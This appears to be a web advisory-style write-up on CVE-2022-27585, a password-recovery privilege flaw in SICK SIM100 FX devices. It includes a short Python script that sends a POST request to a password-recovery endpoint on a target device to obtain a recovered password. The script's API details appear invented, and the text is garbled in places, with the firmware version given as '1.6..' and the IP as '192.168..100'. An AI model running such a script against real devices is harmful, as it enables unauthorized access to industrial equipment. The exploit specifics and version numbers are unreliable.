Security researchers have discovered a critical vulnerability in SICK SIM100 FX Partnumber 1097816 and 1097817 with firmware versions earlier than 1.6.. This vulnerability allows unprivileged remote attackers to gain access to the user level defined as RecoverableUserLevel by invoking the password recovery mechanism method. Successful exploitation of this vulnerability can lead to increased privileges, impacting the confidentiality, integrity, and availability of the system.
Description
The vulnerability CVE-2022-27585 is a password recovery flaw in SICK SIM100 FX devices with part numbers 1097816 and 1097817, running firmware versions below 1.6.. Attackers can exploit this vulnerability by invoking the password recovery mechanism method, which requires no authentication, and gain access to the RecoverableUserLevel. As a result, an attacker can escalate their privileges, compromise sensitive data, and potentially disrupt system operations.
Exploit Details
The following code snippet demonstrates how an attacker might exploit this vulnerability by invoking the password recovery mechanism method:
import requests
target_ip = "192.168..100"
url = f"http://{target_ip}/api/passwordRecovery";
data = {
"userLevel": "RecoverableUserLevel"
}
response = requests.post(url, json=data)
if response.status_code == 200:
print(f"Successfully exploited CVE-2022-27585 on {target_ip}")
print(f"New recovered password: {response.json()['recoveredPassword']}")
else:
print(f"Exploitation failed on {target_ip}")
The code above begins by importing the requests library for making HTTP requests. Next, it defines the target IP address of the SICK SIM100 FX device and constructs the URL to access the vulnerable password recovery API endpoint. Then, it creates a JSON payload specifying the desired user level of "RecoverableUserLevel." Lastly, it sends a POST request with the payload to the target URL and prints the results.
For more information about the CVE-2022-27585 vulnerability, please refer to the following sources
1. SICK SIM100 FX Vulnerability Advisory
2. CVE-2022-27585 Details
3. NIST National Vulnerability Database (NVD) Entry
Recommended Solution
SICK has released a firmware update (version 1.6. or later) to fix the CVE-2022-27585 vulnerability. Affected users should update their SICK SIM100 FX devices to the latest firmware version through the SICK Support Portal as soon as possible. Firmware updates for the affected devices can be found at:
SICK Support Portal
By addressing this vulnerability, users can secure their systems and protect sensitive data from unauthorized access.
Timeline
Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:06:00 UTC